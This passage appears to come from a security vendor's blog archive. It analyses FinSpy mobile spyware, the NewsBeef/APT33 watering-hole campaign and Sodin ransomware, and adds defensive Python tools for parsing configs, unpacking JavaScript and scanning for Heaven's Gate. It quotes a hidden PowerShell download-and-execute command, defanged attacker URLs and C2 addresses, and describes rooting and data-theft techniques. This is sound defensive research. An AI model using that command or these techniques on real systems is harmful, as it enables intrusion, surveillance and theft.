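A parser for the configuration layout just described, added here as an example and not Gamma’s format specification or Kaspersky’s tooling: it reassembles the asset pieces, walks size-prefixed records and labels the five settings the paragraph above names. The record header (a 4-byte type hash followed by a 4-byte little-endian size), the hash values and the sample values are all constructed assumptions; the compression step, whose format the text does not name, is left out.

```python
import struct

# Setting-type hashes are placeholders: the real FinSpy hash values are not given in
# the write-up. The names are the settings it lists from the developer build.
SETTING_NAMES = {
    0x00000001: "mobile_target_id",
    0x00000002: "proxy_ip",
    0x00000003: "proxy_port",
    0x00000004: "sms_control_number",
    0x00000005: "implant_uid",
}
# Assumed record header: type hash, then the little-endian size of the value.
HEADER = struct.Struct("<II")


def reassemble(pieces: list) -> bytes:
    """Concatenate the asset-file pieces in order. The write-up says the config is split
    across files in the apk's assets and stored compressed; decompression (format not
    named there) would precede this step."""
    return b"".join(pieces)


def parse_config(blob: bytes) -> list:
    """Walk [type hash][size][value] records; stop cleanly on a truncated tail."""
    records, offset = [], 0
    while offset + HEADER.size <= len(blob):
        type_hash, size = HEADER.unpack_from(blob, offset)
        start = offset + HEADER.size
        if start + size > len(blob):
            records.append({"error": f"truncated record at offset {offset}"})
            break
        value = blob[start:start + size]
        records.append({"type_hash": type_hash,
                        "name": SETTING_NAMES.get(type_hash, f"unknown_{type_hash:08x}"),
                        "value": value})
        offset = start + size
    return records


def decode_value(rec: dict):
    """Best-effort decode: proxy_port as a little-endian integer, the rest as UTF-8."""
    if rec["name"] == "proxy_port" and len(rec["value"]) in (2, 4):
        return int.from_bytes(rec["value"], "little")
    return rec["value"].decode("utf-8", errors="replace")


def build_sample_pieces() -> list:
    """Constructed sample config, split into two pieces at an arbitrary boundary."""
    def rec(type_hash, value):
        return HEADER.pack(type_hash, len(value)) + value
    blob = (rec(1, b"target-0042") + rec(2, b"203.0.113.7")
            + rec(3, (8443).to_bytes(2, "little"))
            + rec(4, b"+000000000000") + rec(5, b"IMPLANT-PLACEHOLDER"))
    return [blob[:20], blob[20:]]


if __name__ == "__main__":
    for r in parse_config(reassemble(build_sample_pieces())):
        print(r.get("name", r.get("error")), decode_value(r) if "value" in r else "")
```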

As in the case of the iOS implant, the Android version can be installed manually if the attacker has physical access to the device, and by remote infection vectors: SMS messages, emails and WAP Push. After successful installation, the implant tries to gain root privileges by checking for the presence of known rooting modules SuperSU and Magisk and running them. If no utilities are present, the implant decrypts and executes the DirtyCow exploit, which is located inside the malware; and if it successfully manages to get root access, the implant registers a custom SELinux policy to get full access to the device and maintain root access. If it used SuperSU, the implant modifies SuperSU preferences in order to silence it, disables its expiry and configures it to autorun during boot. It also deletes all possible logs including SuperSU logs.

The implant provides access to information such as contacts, SMS/MMS messages, calendars, GPS location, pictures, files in memory and phone call recordings. All the exfiltrated data is transferred to the attacker via SMS messages or via the internet (the C2 server location is stored in the configuration file). Personal data, including contacts, messages, audios and videos, can be exfiltrated from most popular messengers. Each of the targeted messengers has its own unified handling module, which makes it easy to add new handlers if needed.

The full hardcoded list of supported messengers is shown below:

Package name: application name
com.bbm: BBM (BlackBerry Messenger)
com.facebook.orca: Facebook Messenger
com.futurebits.instamesssage.free: InstaMessage
jp.naver.line.android: Line Messenger
org.thoughtcrime.securesms: Signal
com.skype.raider: Skype
org.telegram.messenger: Telegram
ch.threema.app: Threema
com.viber.voip: Viber
com.whatsapp: WhatsApp

At first, the implant checks that the targeted messenger is installed on the device (using a hardcoded package name) and that root access is granted. After that, the messenger database is prepared for data exfiltration. If necessary, it can be decrypted with the private key stored in its private directory, and any required information can be simply queried:

All media files and information about the user are exfiltrated as well.


FinSpy implants are controlled by the FinSpy Agent (operator terminal). By default, all implants are connected to FinSpy anonymizing proxies (also referred to as FinSpy Relays) provided by Gamma Group. This is done to hide the real location of the FinSpy Master. As soon as the infected target system appears online, it sends a heartbeat to the FinSpy Proxy. The FinSpy Proxy forwards connections between targets and a master server. The FinSpy Master server manages all targets and agents and stores the data. Based on decrypted configuration files, our experts were able to find the different relays used by the victims and their geographical location. Most of the relays we found are concentrated in Europe, with some in South East Asia and the USA.


FinSpy mobile implants are advanced malicious spy tools with diverse functionality. Various configuration capabilities provided by Gamma Group in their product enable the FinSpy terminal (FinSpy Agent) operators to tailor the behavior of each implant for a particular victim and effectively conduct surveillance, exfiltrating sensitive data such as GPS location, contacts, calls and other data from various instant messengers and the device itself.

The Android implant has functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. As for the iOS version, it seems that Gamma’s solution doesn’t provide infection exploits for its customers, as their product seems to be fine-tuned to clean traces of publicly available jailbreaking tools. That might imply physical access to the victim in cases where devices are not already jailbroken. At the same time, multiple features that we haven’t observed before in malware designed for this platform are implemented.

Since the leak in 2014, Gamma Group has recreated significant parts of its implants, extended supported functionality (for example, the list of supported instant messengers has been significantly expanded) and at the same time improved encryption and obfuscation (making it harder to analyze and detect implants), which made it possible to retain its position in the market.

Overall, during the research, up-to-date versions of these implants used in the wild were detected in almost 20 countries. However, assuming the size of Gamma’s customer base, it’s likely that the real number of victims is much higher.

A full set of IOCs, including YARA rules, is available to customers of the Kaspersky Intelligence Reporting service. For more information, contact intelreports@kaspersky.com

4 July 2019

‘Twas the night before

Recently, the United States Cyber Command (USCYBERCOM Malware Alert @CNMF_VirusAlert) highlighted several VirusTotal uploads of theirs – and the executable objects relating to 2016 – 2017 NewsBeef/APT33 activity are interesting for a variety of reasons. Before continuing, it’s important to restate yet again that we defend customers, and research malware and intrusions, regardless of their source. Accordingly, subscribers to our private APT intelligence reports receive unique and extraordinary data on the significant activity and campaigns of over 100 APTs from all over the world, including this 2016-2017 NewsBeef/APT33 activity.

USCYBERCOM’s VirusTotal executable object uploads appeared in our January 2017 private report “NewsBeef Delivers Christmas Presence”, an examination of a change in the tactics used in spear-phishing and watering hole attacks against Saudi Arabian targets. Two files uploaded by USCYBERCOM are of particular interest. These were first seen Dec 2016 and Jan 2017:

MD5: d87663ce6a9fc0e8bc8180937b3566b9, served as
Detected as BSS:Exploit.Win32.Generic, Trojan-Downloader.Win32.Powdr.a, Trojan-Downloader.MSIL.Steamilik.zzo

MD5: 9b1a06590b091d300781d8fbee180e75, served as
Detected as BSS:Exploit.Win32.Generic, Trojan-Downloader.PowerShell.Agent.ah, DangerousObject.Multi.Generic

In order to share insight into Cyber Command’s highlighted malware and its context, some of our private report’s content will be re-written here. The January 2017 report followed up on other private reports published on the group’s BeEF-related activity in 2015 and 2016. All of them cover a thread of mid-2015 activity continuing into 2016, then resetting and advancing in 2016 and into 2017. Bear in mind that regardless of current leaks, which do not always present exhaustive information on group participants, activity from the region has had multiple overlaps and presents a confusion of internal dynamics…

NewsBeef Delivers Christmas Presence

Examination of a change in tactics used in spearphishing and watering hole attacks against Saudi Arabian targets

Executive summary

The NewsBeef APT previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets, and lacks advanced offensive technology development capabilities.

In previous campaigns, NewsBeef relied heavily on its namesake technology, the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that includes macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails, links sent over social media/standalone private messaging applications, and watering hole attacks that leverage compromised high-profile websites (some belonging to the SA government). The group changed multiple characteristics year over year – tactics, the malicious JavaScript injection strategically placed on compromised websites, and command and control (C2) infrastructure.

In a nutshell:

  • The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets;
  • BeEF does not appear to be deployed as a part of the current campaign;
  • Compromised government and infrastructure-related websites are injected with JavaScript that geolocates and redirects visitors to spoofed, attacker-controlled web-servers;
  • Improvements in JavaScript injection and obfuscation may extend server persistence;
  • NewsBeef continues to deploy malicious macro-enabled Office documents, poisoned legitimate Flash and Chrome installers, PowerSploit, and Pupy tools

Technical Analysis

The NewsBeef campaign is divided into two main attack vectors, spearphishing and strategic web compromise (watering hole) attacks. The group’s spearphishing component uses malicious, macro-enabled Microsoft Office documents that deliver PowerShell scripts. The scripts download poisoned installers (e.g. Flash, Citrix Client, and Chrome) from an online presence (in at least one case, the group spoofed a legitimate, well-known IT services organization). Once the installer is downloaded to a victim machine, it runs PowerSploit scripts that in turn download and execute a full-featured Pupy backdoor.

On December 25, 2016, the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations. The group sent these documents (or links to them) to targets via email, and over social network and standalone messaging clients.

To compromise websites and servers, the group identified vulnerable sites and injected obfuscated JavaScript that redirected visitors to NewsBeef-controlled hosts (which tracked victims and served malicious content). These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to their targets.

Targets, social engineering, delivery chain

The majority of NewsBeef targets that our researchers have observed are located in SA. Targeting profiles include:

  • Government financial and administrative organizations
  • Government health organizations
  • Engineering and technical organizations
  • One British labor related government organization (targeted multiple times)

The bulk of the targets were affected through strategic web compromises, especially via compromised government servers. However, Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client “outlook.live.com” as well as attachments arriving through the Outlook desktop application. This behavior falls in line with previous NewsBeef operations, where the group used other standalone messaging clients to send malicious links. Interestingly, NewsBeef set up its server using the hosting provider “Choopa, LLC, US”, the same hosting provider that the group used in attacks over the summer of 2016.

The domain “ntg-sa[.]com” appears to be an attempt by the NewsBeef actor to spoof the legitimate Saudi IT services organization, “National Technology Group” (NTG) at, “ntg.com[.]sa”. The malicious documents served at the spoofed website are shown below:

NTG is a legitimate company that provides IT services and support to SA government organizations and communications firms (as well as international financial groups and retailers), making it a high-value identity. Spoofing the identity of an IT service provider is a particularly important asset to threat actors that can abuse the inherent trust of IT organizations to push software (which may appear suspicious if served from another source). NTG’s IT focus and client list likely aided NewsBeef’s delivery of malicious PowerShell-enabled Office documents and poisoned installers.

In December 2016, the following active URLs were served from the spoofed NTG identity. All of the poisoned installers are technologies that an IT support service may be expected to deliver.


In this scenario, the poisoned Flashplayer, Citrix, or Chrome installer drops the file “install.bat”. The batch file runs the PowerShell command:

powershell.exe -w hidden -noni -nop -c "iex(New-Object

The command downloads “eiloShaegae1”, another PowerShell downloader script. This second PowerShell downloader script downloads and runs the payload: a PowerSploit ReflectivePEInjection script, “hxxp://139.59.46[.]154:3485/IMo8oosieVai”.

The script carries a base64 string which it decodes at runtime. This base64 string is the Pupy backdoor DLL, which is loaded and run in memory, never touching the disk. The Pupy backdoor immediately communicates with 139.59.46[.]154 over obfs3, posting collected system data and retrieving commands.

This choice of “The Threebfuscator” (obfs3) for command and control (C2) communications is interesting, because obfs3 is a pluggable transport designed to mask Tor traffic. Its use may indicate that the attackers understand its effectiveness against outbound connection monitoring.

Another notable spoofed domain used during this campaign is the “maps-modon[.]club” domain. The domain “maps.modon.gov[.]sa” was compromised in December 2016, and the “maps-modon[.]club” domain created on December 8, 2016. The domain shared the same IP address (45.76.32[.]252) as “ntg-sa[.]com”. Although we did not observe any malicious documents retrieved from that domain, it is likely that the domain served the same documents as ntg-sa[.]com. The filenames of the malicious Office documents (hosted at the spoofed NTG site) are relevant to typical IT and contracting resources and indicate that this scheme relies on effective social engineering tactics related to human resources and IT activities.

In other schemes, the attackers sent macro-enabled Office attachments from spoofed law firm identities (or other relevant service providers) to targets in SA. The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign. Below is a screenshot of a fake legal proposal in Word doc format, containing malicious macros and PowerShell code.

The malicious document follows the same chain as the poisoned Flash player or Chrome Installer:

Compromised servers and injected JavaScript

Starting in October 2016, NewsBeef compromised a set of legitimate servers (shown below), and injected JavaScript to redirect visitors to hxxp://analytics-google[.]org:69/Check.aspx:

The entire list of compromised servers is exclusively Saudi Arabian, and includes organizations from the following industries:

  • Energy services for industrial processes
  • Telecom engineering and implementation services
  • Shipping and logistics
  • Metal engineering and manufacturing
  • Information technology services
  • Cement and building materials

These recent attacks against legitimate servers (when compared to previous NewsBeef activity) indicate that NewsBeef operators have improved their technical skills, specifically their ability to covertly inject JavaScript code into served web pages. Their injection and obfuscation techniques enable the actor to serve the same JavaScript with every page visit to the “watering hole” site as well as increase the difficulty of identifying the malicious JavaScript source on compromised sites.

For example, on a Saudi government website, the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site (the packed and unpacked JavaScript is shown below). The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser, browser version, country of origin, and IP address data to the attacker-controlled server “jquerycode-download[.]live/check.aspx”.

It is likely that this collection of visitor information represents an attempt to limit the number of infections to a specific target subset and reduce the attacker’s operational footprint. Although we did not identify injected JavaScript related to the “analytics-google[.]org/check.aspx” redirections, it is likely that it performed similar data collection and exfiltration (via POST). This technique appears to be an improvement over the simple .JPG beaconing which researchers observed in previous NewsBeef watering hole attacks.

Packed JavaScript:

The most trafficked of the compromised sites (which redirect to “jquerycode-download[.]live”) appears to be the government site at “scsb.gov[.]sa/portal/”. A high volume of redirections from the compromised site continues into mid-January 2017.
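For incident responders triaging a suspected watering hole, the first question is what the appended, packed script actually does. The following added example (not code from the report) assumes the injected script uses the common p,a,c,k,e,d packer, which the page does not state; it implements the unpacking step in Python, then reports whether the unpacked script POSTs and which URLs it contacts. The sample script, the host name collector.example and the minimal pack() used only to build the sample are constructed for this example.

```python
import re

ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
WORD = re.compile(r"\b\w+\b")
# Argument list of the packer's self-invoking function: }('payload',radix,count,'w1|w2'.split('|')
PACKER_ARGS = re.compile(r"\}\('(.*?)',\s*(\d+),\s*(\d+),\s*'(.*?)'\.split\('\|'\)", re.S)
URL = re.compile(r"https?://[\w.-]+(?::\d+)?(?:/[^\s'\"<>]*)?")


def encode(n: int, radix: int) -> str:
    """Base-radix token as the packer's e() function produces it (0-9, a-z, then A-Z)."""
    head = encode(n // radix, radix) if n >= radix else ""
    return head + ALPHABET[n % radix]


def decode(tok: str, radix: int) -> int:
    """Inverse of encode(); raises ValueError for tokens that are not valid base-radix digits."""
    n = 0
    for ch in tok:
        d = ALPHABET.find(ch)
        if d < 0 or d >= radix:
            raise ValueError(tok)
        n = n * radix + d
    return n


def pack(src: str, radix: int = 62) -> str:
    """Minimal p,a,c,k,e,d packer used only to construct a test sample; the real packer's
    function body is elided as {...} because unpack() never needs it."""
    words, index = [], {}

    def sub(m):
        w = m.group(0)
        if w not in index:
            index[w] = len(words)
            words.append(w)
        return encode(index[w], radix)

    payload = WORD.sub(sub, src)
    # words that equal their own token are stored empty, as the original packer does
    dictionary = "|".join("" if w == encode(i, radix) else w for i, w in enumerate(words))
    return "eval(function(p,a,c,k,e,d){...}('%s',%d,%d,'%s'.split('|'),0,{}))" % (
        payload, radix, len(words), dictionary)


def unpack(packed: str) -> str:
    """Replace every base-radix token in the payload by its dictionary word."""
    m = PACKER_ARGS.search(packed)
    if not m:
        raise ValueError("not p,a,c,k,e,d output")
    payload, radix, count = m.group(1), int(m.group(2)), int(m.group(3))
    words = m.group(4).split("|")

    def sub(t):
        tok = t.group(0)
        try:
            i = decode(tok, radix)
        except ValueError:
            return tok
        return words[i] if i < count and words[i] else tok

    return WORD.sub(sub, payload)


def triage(script: str) -> dict:
    """Flag a packed script and list the URLs it talks to after unpacking."""
    packed = "eval(function(p,a,c,k,e,d)" in script
    body = unpack(script) if packed else script
    return {"packed": packed,
            "posts": bool(re.search(r"\.open\(\s*[\"']POST", body)),
            "urls": sorted(set(URL.findall(body)))}


# Constructed sample in the shape the page describes: browser data POSTed to a check.aspx.
SAMPLE_JS = ('var x=new XMLHttpRequest();x.open("POST","https://collector.example/check.aspx",true);'
             'x.send("ua="+navigator.userAgent+"&ver="+navigator.appVersion);')

if __name__ == "__main__":
    print(triage(pack(SAMPLE_JS)))
```

The unpacker only needs the argument list of the packer's self-invoking function, so the obfuscated function body can be ignored; tokens whose dictionary entry is empty are left as they are, matching the packer's own behaviour. Since the injected resource differs per site, diffing the tail of each referenced script against a known-good copy is the practical way to locate the injection point before running this on it.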

Below is a list of compromised websites and the associated URL that serves the injected, second layer JavaScript. Note that the JavaScript resource changes on every compromised website among many other referenced JavaScript sources, making it difficult to track down the source of the malicious script per site:



Multiple other relevant sites were compromised and redirecting as well.

The Pupy backdoor

Pupy is an open source, multi-platform (Windows, Linux, OSX, Android), multi-function backdoor. The backdoor is mainly written in Python and uses code from other open source attack tools like PowerSploit, Mimikatz, laZagne, etc. Pupy can generate backconnect or bindport payloads in multiple formats: PE executables (x86/x64) for Windows, ELF binary/.so for Linux, reflective DLLs (x86/x64), pure Python files, PowerShell, apk, and Rubber Ducky script (Windows).

The malicious DLL deployed by NewsBeef contains Python code, a Python interpreter, and the MSVC runtime library as well as code that loads the Python interpreter, runs Python code and exports some functions for Python. A configuration string contains base64-encoded Python code (packed with zlib) with transport configuration and information about C2 server addresses.

When initiated, the Python code attempts to retrieve and use SOCKS/HTTP proxy settings from the victim’s computer. The Python code then tries to initiate a reverse connection to the C2 server (139.59.46[.]154:3543) using a TCP protocol with RSA+AES traffic encryption and obfs3 transport using default keys from Pupy sources.

After a successful connection, NewsBeef Pupy sends information about the infected computer and waits for commands (which take the form of modules) from the C2 server. The C2 server can send modules with Python code and compiled Python C extensions. The main functionality of the backdoor is implemented in packages (Python code, compiled Python C extensions, compiled executable files) and modules (Python code). Modules can directly access Python objects on the remote client using the RPyC module. The Python modules win32com, win32api, and ctypes are used to interact with the Win32 API. Attackers can use standard modules or write their own. All modules are executed in the memory (a Pupy process can migrate between processes using the corresponding module).


Previous reports on the NewsBeef APT noted the group’s reliance on open-source tools to launch simple, yet effective attacks. Historically, the group has used BeEF to track targets and deliver malicious payloads. However, as this recent campaign indicates, the NewsBeef APT appears to have shifted its intrusion toolset away from BeEF and towards macro-enabled malicious Office documents, PowerSploit, and Pupy. Despite this shift in toolset, the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net.

The improvements in tactics, techniques and procedures appear to have paid off. The most recent campaign indicates that the group was able to compromise a larger number of sites, including valuable, high-profile SA government identities. However, despite these improvements in technology, the NewsBeef APT continues to rely on social engineering schemes and open-source tools, attributes that increase the chances of identification.

NewsBeef attacks against Saudi Arabian organizations and individuals (as well as targets in the European Union) are likely to continue. Additionally, researchers expect that as the group evolves, its tasking will expand to other organizations doing business with, or connected to Saudi Arabian organizations and individuals.

Due to the group’s specific target set, it is crucial that SA security teams, administrators, and developers (especially web application administrators/developers) update their WordPress, Joomla, and Drupal-based web applications and plugins – as these assets are actively scanned and exploited by this APT.

Appendix

Related object MD5s (executable code, malicious Office documents, JavaScript, PowerShell, etc.)
  • f4d18316e367a80e1005f38445421b1f
  • 638b74a712a7e45efc9bec126b0f2d87
  • 45b0e5a457222455384713905f886bd4
  • 19cea065aa033f5bcfa94a583ae59c08
  • ecfc0275c7a73a9c7775130ebca45b74
  • 1b5e33e5a244d2d67d7a09c4ccf16e56
  • fa72c068361c05da65bf2117db76aaa8
  • 43fad2d62bc23ffdc6d301571135222c
  • ce25f1597836c28cf415394fb350ae93
  • 03ea9457bf71d51d8109e737158be888
  • edfc37461fa66716b53333fd7f841a8e
  • 623e05dd58d86da76fdfcf9b57032168
  • 6946836f2feb98d6e8021af6259a02dd
  • d87663ce6a9fc0e8bc8180937b3566b9
  • f9adf73bf1cdd7cd278e5137d966ddd4
  • b8373f909fa228c2b6e7d69f065f30fb
  • 9b1a06590b091d300781d8fbee180e75
  • bcafe408567557289003c79f745f7713
  • 83be35956e5d409306a81e88a1dc89fd
  • c2165155fcba5b737ee70354b5244be3
  • 444c93e736194a01bf3b319e3963d746
  • 0ed61b6f1008000c6dfcd3d842b21971
  • 3fb33a2747b39a9b1c5c1e41fade595e
  • b34fd14105be23480c44cfdf6eb26807

Hosting malicious docs, executables, PowerShell and Pupy backdoors

  • moh.com-ho[.]me/Health_insurance_plan.doc
  • moh.com-ho[.]me/Health_insurance_registration.doc
  • mol.com-ho[.]me/cv_itworx.doc
  • mci.com-ho[.]me/cv_mci.doc
  • jquerycode-download[.]live/flashplayer23pp_xa_install.exe
  • jquerycode-download[.]live/citrixcertificate.exe
  • jquerycode-download[.]live/chrome_update.exe
  • jquerycode-download[.]live/CitrixReceiver.exe
  • jquerycode-download[.]live/check.aspx
  • jquerycode-download[.]live/CheckLog.aspx
  • https://ntg-sa[.]com/downloads/citrix_certificate.exe
  • https://ntg-sa[.]com/Downloads/flashplayer23pp_xa_install.exe
  • https://ntg-sa[.]com/Downloads/Chrome_Update.exe
  • http://ntg-sa[.]com/cv.doc
  • http://ntg-sa[.]com/cv_itworx.doc
  • http://ntg-sa[.]com/cv_mci.doc
  • http://ntg-sa[.]com/discount_voucher_codes.xlsm
  • http://ntg-sa[.]com/Health_insurance_plan.doc
  • http://ntg-sa[.]com/Health_insurance_registration.doc
  • http://ntg-sa[.]com/job_titles.doc
  • http://ntg-sa[.]com/job_titles_itworx.doc
  • http://ntg-sa[.]com/job_titles_mci.doc
  • http://ntg-sa[.]com/Password_Policy.xlsm
  • http://itworx.com-ho[.]me/*
  • http://mci.com-ho[.]me/*
  • http://moh.com-ho[.]me/*
  • http://mol.com-ho[.]me/*
  • http://ntg-sa[.]com/*
  • taqa.com[.]sa/arabic/resumes/resume.doc
  • taqa.com[.]sa/arabic/resumes/cv-taqa.doc
  • taqa.com[.]sa/arabic/images/certificate.crt.exe
  • taqa.com[.]sa/arabic/tempdn/cv-taqa.doc
  • 104.218.120[.]128/pro.bat
  • 104.218.120[.]128/msservice-a-2.exe
  • 104.218.120[.]128/msservice-a-4.exe
  • 104.218.120[.]128/check.aspx
  • 104.218.120[.]128:69/checkFile.aspx
  • 139.59.46[.]154/IMo8oosieVai
  • 139.59.46[.]154:3485/eiloShaegae1
  • 69.87.223[.]26/IMo8oosieVai
  • 69.87.223[.]26:8080/eiloShaegae1
  • 69.87.223[.]26:8080/p

Additional C2

  • analytics-google[.]org:69/check.aspx
  • analytics-google[.]org/checkFile.aspx
  • jquerycode-download[.]live/check.aspx
  • jquerycode-download[.]live/checkFile.aspx
  • go-microstf[.]com/checkFile.aspx
  • 104.218.120[.]128/check.aspx
  • 104.218.120[.]128:69/checkFile.aspx
3 July 2019

Sodin ransomware exploits Windows vulnerability and processor architecture

When Sodin (also known as Sodinokibi and REvil) appeared in the first half of 2019, it immediately caught our attention for distributing itself through an Oracle WebLogic vulnerability and carrying out attacks on managed service providers (MSPs). In a detailed analysis, we discovered that it also exploits the CVE-2018-8453 vulnerability to elevate privileges in Windows (rare among ransomware), and uses legitimate processor functions to circumvent security solutions.

According to our statistics, most victims were located in the Asia-Pacific region: Taiwan, Hong Kong, and South Korea.


Geographic spread of Sodin ransomware, April – June 2019

Technical description

Vulnerability exploitation

To escalate privileges, Trojan-Ransom.Win32.Sodin uses a vulnerability in win32k.sys; attempts to exploit it were first detected by our proactive technologies (Automatic Exploit Prevention, AEP) in August last year. The vulnerability was assigned the number CVE-2018-8453. After the exploit is executed, the Trojan acquires the highest level of privileges.

Information about the process token after exploit execution

Exploit snippet for checking the window class

Depending on the processor architecture, one of two shellcode options contained in the Trojan body is run:

Procedure for selecting the appropriate shellcode option

Since the binary being analyzed is a 32-bit executable file, we are interested in how it manages to execute 64-bit code in its address space. The screenshot shows a shellcode snippet for executing 64-bit processor instructions:

Shellcode consisting of 32-bit and 64-bit instructions

In a 64-bit OS, the segment selector for 32-bit user mode code is 0x23, while the 64-bit segment selector is 0x33. This is confirmed by looking at the Global Descriptor Table (GDT) in the kernel debugger:

Part of the GDT in OS Windows 10 x64

The selector 0x23 points to the fourth segment descriptor (0x23 >> 3), and the selector 0x33 to the sixth (the null descriptor is not used). The Nl flag indicates that the segment uses 32-bit addressing, while the Lo flag specifies 64-bit. It is important that the base addresses of these segments are equal. At the time of shellcode execution, the selector 0x23 is located in the segment register cs, since the code is executed in a 32-bit address space. With this in mind, let’s take a look at the listing of the very start of the shellcode:

Saving the full address 0x23:0xC

After the instructions at RVA 6 and 7 execute, the far return address is stored at the top of the stack in selector:offset form and reads 0x23:0x0C. At RVA 0x11, a DWORD is placed on the stack whose low-order word contains the selector 0x33 and whose high-order word encodes the retf instruction, the opcode of which is 0xCB.

Saving the full address 0x33:0x1B to 64-bit code

Switching to 64-bit mode

The next instruction, call (at RVA 0x16), performs a near (intrasegment) jump to this retf instruction (RVA 0x14), pushing the near return address (offset 0x1b) onto the stack. So when retf executes, the top of the stack holds an address in selector:offset form with selector 0x33 and offset 0x1b. After retf, the processor continues executing at that address, now in 64-bit mode.

64-bit shellcode

The return to 32-bit mode is performed at the very end of the shellcode.

Returning to 32-bit mode

The retf instruction performs a far (intersegment) return to the address 0x23:0x0C, which was placed on the stack at the very start of the shellcode (RVA 6-7). This technique of executing 64-bit code inside a 32-bit process address space is called Heaven’s Gate, and was first described around ten years ago.
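A triage check for the idiom just described, added here as an example and not part of the original analysis: a Python scanner for the generic opcode sequences that switch code segment (a push of selector 0x33 followed by retf, a far jmp to 0x33, and the mirror-image return to 0x23), run over a constructed byte buffer. The byte patterns are the well-known generic forms, not bytes taken from Sodin (the page shows its shellcode only as screenshots), and the push imm32 variant encodes one reading of the layout described above, so treat it as an assumption.

```python
import re

# Opcode idioms used to change code segment from inside a 32-bit process (generic forms):
#   6A 33 E8 00 00 00 00 83 04 24 05 CB  push 0x33; call $+5; add dword [esp],5; retf
#   68 33 00 xx CB                       push imm32 with selector 0x33 in the low word and
#                                        0xCB as its last byte (one reading of the layout above)
#   EA xx xx xx xx 33 00                 jmp far 0x33:offset32
#   6A 23 ... CB                         the mirror image: far return to the 32-bit segment
GATE_PATTERNS = [
    ("push-0x33...retf", re.compile(rb"\x6a\x33.{0,16}?\xcb", re.S)),
    ("push-imm32(0x33,retf)", re.compile(rb"\x68\x33\x00.\xcb", re.S)),
    ("jmp-far-0x33", re.compile(rb"\xea.{4}\x33\x00", re.S)),
    ("push-0x23...retf", re.compile(rb"\x6a\x23.{0,16}?\xcb", re.S)),
]


def describe_selector(sel: int) -> dict:
    """Split a segment selector into descriptor index, table indicator and requested privilege level."""
    return {"index": sel >> 3, "table": "LDT" if sel & 4 else "GDT", "rpl": sel & 3}


def scan_heavens_gate(buf: bytes) -> list:
    """Return sorted (offset, idiom) pairs. A triage heuristic only: 6A 33 and CB also occur in data."""
    hits = []
    for name, pat in GATE_PATTERNS:
        hits.extend((m.start(), name) for m in pat.finditer(buf))
    return sorted(hits)


# Constructed sample buffer: nop sled, classic gate, a few 64-bit bytes, a far jmp, a return gate.
CLASSIC_GATE = bytes.fromhex("6a33e80000000083042405cb")
RETURN_GATE = bytes.fromhex("6a23e80000000083042405cb")
SAMPLE = (b"\x90" * 16 + CLASSIC_GATE + b"\x48\x31\xc0" + b"\x00" * 8
          + bytes.fromhex("ea001040003300") + b"\x90" * 4 + RETURN_GATE)

if __name__ == "__main__":
    for off, name in scan_heavens_gate(SAMPLE):
        print(hex(off), name)
    print(describe_selector(0x23), describe_selector(0x33))
```

Matches are worth a look in a debugger, not a verdict on their own, since these byte values are common in ordinary data; the selector helper reproduces the mapping from the GDT listing above (0x23 and 0x33 are GDT indices 4 and 6 with RPL 3).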

Trojan configuration

Stored in encrypted form in the body of each Sodin sample is a configuration block containing the settings and data required for the Trojan to work.

Decrypted Trojan configuration block

The Sodin configuration has the following fields:

Field: Purpose
  • pk: distributor public key
  • pid: probably distributor ID
  • sub: probably campaign ID
  • dbg: debug build
  • fast: fast encryption mode (maximum 0x100000 bytes)
  • wipe: deletion of certain files and overwriting of their content with random bytes
  • wfld: names of directories in which the Trojan deletes files
  • wht: names of directories and files, and list of extensions, not to be encrypted
  • prc: names of processes to be terminated
  • dmn: server addresses for sending statistics
  • net: sending infection statistics
  • nbody: ransom note template
  • nname: ransom note file name template
  • exp: use of exploit for privilege escalation
  • img: text for desktop wallpaper

Cryptographic scheme

Sodin uses a hybrid scheme to encrypt victim files. The file contents are encrypted with the Salsa20 symmetric stream algorithm, and the keys for it with an elliptic curve asymmetric algorithm. Let’s take a closer look at the scheme.

Since some data is stored in the registry, this article uses the names given by the ransomware itself. For entities not in the registry, we use invented names.

Data saved by the Trojan in the registry

Key generation

The Sodin configuration block contains the pk field, which is saved in the registry under the name sub_key – this is the 32-byte public key of the Trojan distributor. The key is a point on the Curve25519 elliptic curve.

When launched, the Trojan generates a new pair of elliptic curve session keys; the public key of this pair is saved in the registry under the name pk_key, while the private key is encrypted using the ECIES algorithm with the sub_key key and stored in the registry under the name sk_key. The ECIES implementation in this case includes the Curve25519 elliptic curve, the SHA3-256 cryptographic hash, and the AES-256 block cipher in CFB mode. Other ECIES implementations have been encountered in Trojans before, for example, in SynAck targeted ransomware.

Curiously, the same private session key is also encrypted with another public key hardcoded into the body of the Trojan, regardless of the configuration. We will call it the public skeleton key. The encryption result is stored in the registry under the name 0_key. It turns out that someone who knows the private key corresponding to the public skeleton key is able to decrypt the victim’s files, even without the private key for sub_key. It seems like the Trojan developers built a loophole into the algorithm allowing them to decrypt files behind the distributors’ back.

Snippet of the procedure that generates key data and stores some of it in the registry

File encryption

During encryption of each file, a new pair of elliptic curve asymmetric keys is generated, which we will call file_pub and file_priv. Next, SHA3-256(ECDH(file_priv, pk_key)) is calculated, and the result is used as the symmetric key for encrypting file contents with the Salsa20 algorithm. The following information is also saved in the encrypted file:

Data stored in each encrypted file

In addition to the fields discussed above, each encrypted file also stores a nonce (8 random bytes used as the Salsa20 initialization value), file_pub_crc32 (a checksum of file_pub), flag_fast (if set, only part of the file data is encrypted), and zero_encr_by_salsa (a zero DWORD encrypted with the same Salsa20 key as the file contents, apparently used to verify that decryption is correct).

